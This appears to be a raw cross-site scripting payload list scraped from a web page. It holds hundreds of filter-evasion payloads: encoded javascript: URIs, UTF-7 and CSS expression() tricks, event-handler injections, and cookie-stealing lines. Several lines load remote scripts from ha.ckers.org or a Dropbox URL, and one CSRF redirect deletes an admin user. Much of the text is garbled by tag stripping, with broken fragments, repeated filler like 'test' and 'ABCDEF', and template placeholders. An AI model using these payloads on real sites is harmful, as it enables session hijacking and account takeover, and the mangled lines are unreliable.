alert("XSS")">

alert("XSS");//

a=/XSS/alert(a.source)

\";alert('XSS');//

alert("XSS");

¼script¾alert(¢XSS¢)¼/script¾

@im\port'\ja\vasc\ript:alert("XSS")';

exp/*

a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

document.write("PT SRC="ha.ckers.org/xss.js">

TESTHTML5FORMACTION

crosssitespt

alert(1)">

alert(1)">

alert(1)">

({0:#0=alert/#0#/#0#(123)})

ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x

Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()

{alert(1)};1

crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')

alert(1)

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

%253cscript%253ealert(document.cookie)%253c/script%253e

“>alert(document.cookie)

“>alert(document.cookie)

“>alert(document.cookie);//

fooalert(document.cookie)

ipt>alert(document.cookie)ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=my.box.com/xss.js%3E%3C/script%3E%22)’%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

alert(document.cookie)

alert(1)

">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

'';!--"=&{()}

0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

xxs link

xxs link

alert("XSS")">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

alert("XSS");//

<IMG SRC="javascript:alert('XSS')"

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

\";alert('XSS');//

alert('XSS');

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

@import'ha.ckers.org/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}

@im\port'\ja\vasc\ript:alert("XSS")';

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

alert('XSS');

.XSS{background-image:url("javascript:alert('XSS')");}

BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

alert('XSS');

'"-->

alert("XSS")'); ?>

alert('XSS')">

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

" SRC="ha.ckers.org/xss.js">

" SRC="ha.ckers.org/xss.js">

" '' SRC="ha.ckers.org/xss.js">

'" SRC="ha.ckers.org/xss.js">

` SRC="ha.ckers.org/xss.js">

'>" SRC="ha.ckers.org/xss.js">

document.write("PT SRC="ha.ckers.org/xss.js">

XSS

0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#">

element[attribute='

[[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

alert;pg("XSS")

for((i)in(self))eval(i)(1)

ipt>alert(1)ipt>ipt>alert(1)ipt>

iPt>alert(1)IPt>

test

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";

">">123

">123

">123

">alert(`text you want to be displayed`);<iframe frameborder="0%ef%bb%bf

">123

">123

><IFRAME width="420" height="315" frameborder="0" onmouseover="<a href="http://document.location.href=" target="_blank" rel="nofollow">document.location.href=</a>'https://<a href="http://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr" target="_blank" rel="nofollow">www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr</a>

g'">Hover the cursor to the LEFT of this Message&ParamHeight=250

">">123

">123

<iframe src=<a href="http://xss.rocks/scriptlet.html" target="_blank" rel="nofollow">xss.rocks/scriptlet.html</a> <

{font-family&colon;''

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`` onerror=<a href="http://this.onerror=confirm" target="_blank" rel="nofollow">this.onerror=confirm</a>(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/**/alert(1)/**/</script /**/

&#34;&#62;

">

<script xlink:href=data&colon;,<a href="http://window.open" target="_blank" rel="nofollow">window.open</a>('https://<a href="http://www.google.com/" target="_blank" rel="nofollow">www.google.com/</a>') </script

<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}

X</a

http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script

XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(49))</script ^__^

/**/alert(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)/**/</script &amp;#32; :-(

&#00;

/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

alert(0%0)

SPAN

<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)

&#34;&#62;{-o-link-source&colon;''

&#13;OnMouseOver {Firefox & Opera}

^__^

X {IE7}

<iframe// src=javaSCRIPT&colon;alert(1)

////

/*iframe/src*/

//|\\ //|\\ </script //|\\

/{src&#x3A;''/

<plaintext/onmouseover=prompt(1)

''alert&#x28;1&#x29; {Opera}

DIV

On Mouse Over

Click Here

alert(1);

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<iframe/src=javascript:confirm(1)

http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script .com

alert(1)

click

MsgBox+1

">X</a

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

</script a=\u0061 & /=%2F

</script

+-+-1-+-+alert(1)

/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

//&NewLine;confirm(1);

alert(1)

ClickMe

alert(1) </script 1=2

style="x:">

--!>

">

CLICKME

click

Click Me

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

'`">javascript:alert(1)

'`">javascript:alert(1)

\x3Cscript>javascript:alert(1)

'"`>/* *\x2Fjavascript:alert(1)// */

javascript:alert(1)</script\x0D

javascript:alert(1)</script\x0A

javascript:alert(1)</script\x0B

javascript:alert(1)

-->

--> -->

--> -->

--> -->

--> -->

`"'>

test

"'`>a='hello\x27;javascript:alert(1)//';

test

test

test

test

test

test

test

test

test

test

test

test

test

test

/* *\x2A/javascript:alert(1)// */

/* *\x00/javascript:alert(1)// */

"'`>ABCDEF

"'`>ABCDEF

if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}

if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}

if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}

'`">javascript:alert(1)

'`">javascript:alert(1)

"'`>

"'`>

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

"`'>\x3Bjavascript:alert(1)

"`'>\x0Djavascript:alert(1)

"`'>\xEF\xBB\xBFjavascript:alert(1)

"`'>\xE2\x80\x81javascript:alert(1)

"`'>\xE2\x80\x84javascript:alert(1)

"`'>\xE3\x80\x80javascript:alert(1)

"`'>\x09javascript:alert(1)

"`'>\xE2\x80\x89javascript:alert(1)

"`'>\xE2\x80\x85javascript:alert(1)

"`'>\xE2\x80\x88javascript:alert(1)

"`'>\x00javascript:alert(1)

"`'>\xE2\x80\xA8javascript:alert(1)

"`'>\xE2\x80\x8Ajavascript:alert(1)

"`'>\xE1\x9A\x80javascript:alert(1)

"`'>\x0Cjavascript:alert(1)

"`'>\x2Bjavascript:alert(1)

"`'>\xF0\x90\x96\x9Ajavascript:alert(1)

"`'>-javascript:alert(1)

"`'>\x0Ajavascript:alert(1)

"`'>\xE2\x80\xAFjavascript:alert(1)

"`'>\x7Ejavascript:alert(1)

"`'>\xE2\x80\x87javascript:alert(1)

"`'>\xE2\x81\x9Fjavascript:alert(1)

"`'>\xE2\x80\xA9javascript:alert(1)

"`'>\xC2\x85javascript:alert(1)

"`'>\xEF\xBF\xAEjavascript:alert(1)

"`'>\xE2\x80\x83javascript:alert(1)

"`'>\xE2\x80\x8Bjavascript:alert(1)

"`'>\xEF\xBF\xBEjavascript:alert(1)

"`'>\xE2\x80\x80javascript:alert(1)

"`'>\x21javascript:alert(1)

"`'>\xE2\x80\x82javascript:alert(1)

"`'>\xE2\x80\x86javascript:alert(1)

"`'>\xE1\xA0\x8Ejavascript:alert(1)

"`'>\x0Bjavascript:alert(1)

"`'>\x20javascript:alert(1)

"`'>\xC2\xA0javascript:alert(1)

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

">

">

">

">

">

">

">

">

">

">

">

">

">

">

">

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

javascript:alert(1)

<video poster=javascript:javascript:alert(1)//

...............

Clickme clickme

XXX

javascript:alert(1)

alert(1)0

document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

javascript:alert(1)">

javascript:alert(1)">

javascript:alert(1)">

javascript:alert(1)'>">

javascript:alert(1)">

javascript:alert(1)">

d.innerHTML=d.innerHTML

XXX

javascript:alert(1)"` `>

">

javascript:alert(1)

-->

p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};

<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d

@import "data:,*%7bx:expression(javascript:alert(1))%7D";

XXXXXX

*[{}@import'%(css)s?]X

XXX

XXX

*{x:expression(javascript:alert(1))}

X with(document.getElementById("d"))innerHTML=innerHTML

XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}

XXX

({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval

({0:#0=eval/#0#/#0#(javascript:alert(1))})

ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x

Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()

&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

&alert&A7&(1)&R&UA;&&

¼script¾javascript:alert(1)¼/script¾

XXX

%(payload)s

javascript:alert(1)

%(payload)s//

<IMG SRC="javascript:javascript:alert(1)"

<iframe src=%(scriptlet)s <

@import'%(css)s';

; REL=stylesheet">

li {list-style-image: url("javascript:javascript:alert(1)");}XSS

javascript:alert(1);

.XSS{background-image:url("javascript:javascript:alert(1)");}

BODY{background:url("javascript:javascript:alert(1)")}

javascript:alert(1);

XSS""","XML namespace."),("""&lt;IMG SRC="javascript:javascript:alert(1)"&gt;

+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

@import'%(css)s';

a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}

&&javascript:alert(1)&&;&&

javascript:alert(1);

]]

test1

test1

%(payload)s">

">

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

>">'>alert(String.fromCharCode(88,83,83))

'';!--"=&{()}

xxs link

xxs link

alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

<IMG SRC="javascript:alert('XSS')"

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

\";alert('XSS');//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

@import'ha.ckers.org/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}

@im\port'\ja\vasc\ript:alert("XSS")';

exp/*

alert('XSS');

.XSS{background-image:url("javascript:alert('XSS')");}

BODY{background:url("javascript:alert('XSS')")}

BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

'"-->

alert("XSS")'); ?>

Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser

alert('XSS')">

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

" SRC="ha.ckers.org/xss.js">

" SRC="ha.ckers.org/xss.js">

" '' SRC="ha.ckers.org/xss.js">

'" SRC="ha.ckers.org/xss.js">

` SRC="ha.ckers.org/xss.js">

'>" SRC="ha.ckers.org/xss.js">

document.write("PT SRC="ha.ckers.org/xss.js">

XSS

XSS

XSS

XSS

XSS

XSS

{font-family&colon;''

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`` onerror=<a href="http://this.onerror=confirm" target="_blank" rel="nofollow">this.onerror=confirm</a>(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/**/alert(1)/**/</script /**/

&#34;&#62;

">

</script

<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}

X</a

http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script

XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(49))</script ^__^

/**/alert(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)/**/</script &amp;#32; :-(

&#00;

/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

alert(0%0)

SPAN

<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)

&#34;&#62;{-o-link-source&colon;''

&#13;OnMouseOver {Firefox & Opera}

^__^

X {IE7}

<iframe// src=javaSCRIPT&colon;alert(1)

////

/*iframe/src*/

//|\\ //|\\ </script //|\\

/{src&#x3A;''/

<plaintext/onmouseover=prompt(1)

''alert&#x28;1&#x29; {Opera}

DIV

On Mouse Over

Click Here

alert(1);

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<iframe/src=javascript:confirm(1)

click

MsgBox+1

">X</a

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

</script a=\u0061 & /=%2F

</script

+-+-1-+-+alert(1)

/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

//&NewLine;confirm(1);

alert(1)

ClickMe

alert(1) </script 1=2

style="x:">

--!>

">

CLICKME

click

Click Me

'';!--"=&{()}

'>//\\,">">"*"

'); alert('XSS

alert(1);

alert('XSS');

alert("XSS")">

ipt>alert('XSS');ipt>

alert(String.fromCharCode(88,83,83))

@im\port'\ja\vasc\ript:alert(\"XSS\")';

alert(\"XSS\")'); ?>

alert('XSS')

">alert(0)

alert(/xss/)

alert(/xss/)

alert('XSS')

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

onload=alert('XSS')>

">

'>>XSS

'">>alert('XSS')

'">>XSS

var var = 1; alert(var)

BODY{background:url("javascript:alert('XSS')")}

alert("XSS")'?>

" onfocus=alert(<a href="http://document.domain" target="_blank" rel="nofollow">document.domain</a>) "> <"

li {list-style-image: url(\"javascript:alert('XSS')\");}XSS

perl -e 'print \"alert(\"XSS\")\";' > out

perl -e 'print \"\";' > out

alert(1)

alert(1)

">

[color=red width=expression(alert(123))][color]

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

">alert(123)

'">alert(1111)

'">alert(document.cookie)

'""> alert('X \nS \nS');

>>>alert(123)

(123)(123)

'>alert(123)

'>">

}a=eval;b=alert;a(b(/XSS/.source));

document.write("XSS");

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='>alert("xss")

"+src="yoursite.com/xss.js?69,69">

alert(navigator.userAgent)>

">/XaDoS/>alert(document.cookie)

">/KinG-InFeT.NeT/>alert(document.cookie)

src="www.site.com/XSS.js">

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" />alert('xss');

alert("XSS by \nxss")XSS by xss

">alert("XSS by \nxss")>XSS by xss

'">alert("XSS by \nxss")>XSS by xss

alert("XSS by \nxss")XSS by xss

alert(1337)XSS by xss

">alert(1337)">alert("XSS by \nxss

'">alert(1337)>XSS by xss

XSS by xss

'>alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(88,83,83))<img src="" alt='

">alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(88,83,83))<img src="" alt="

\'>alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(88,83,83))<img src="" alt=\'

http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??

http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??

'); alert('xss'); var x='

\\'); alert(\'xss\');var x=\'

//-->alert(String.fromCharCode(88,83,83));

>">alert(561177485777)%3B

alert(“XSS”);

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}

&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;

<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;

&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;

&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;

&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;

&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;

&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;

&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;

&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;

&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

<IMG SRC="www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser

exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);

&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS

&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;

<LAYER SRC="ha.ckers.org/scriptlet.html"></LAYER>

&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;

&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;

<OBJECT TYPE="text/x-scriptlet" DATA="ha.ckers.org/scriptlet.html"></OBJECT>

&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;

<EMBED SRC="ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);

&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;

&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;

&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;

&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;

&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;

&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;

<LINK REL="stylesheet" HREF="ha.ckers.org/xss.css">

<STYLE>@import'ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}</STYLE>

&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;

&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;

&lt;HTML xmlns:xss&gt;

&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;

&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;

<XML SRC="ha.ckers.org/xsstest.xml" ID=I></XML>

&lt;HTML&gt;&lt;BODY&gt;

&lt;!--[if gte IE 4]&gt;

&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;

<XSS STYLE="behavior: url(ha.ckers.org/xss.htc);">

<SCRIPT SRC="ha.ckers.org/xss.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=ha.ckers.org/xss.js></SCRIPT>'"-->

&lt;? echo(&apos;&lt;SCR)&apos;;

&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;

&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;

&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;

&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;

&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;

&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;

&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;

&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-

\&quot;;alert(&apos;XSS&apos;);//

&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;

&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;

&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;

&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;

perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out

perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out

&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;

<SCRIPT/XSS SRC="ha.ckers.org/xss.js"></SCRIPT>

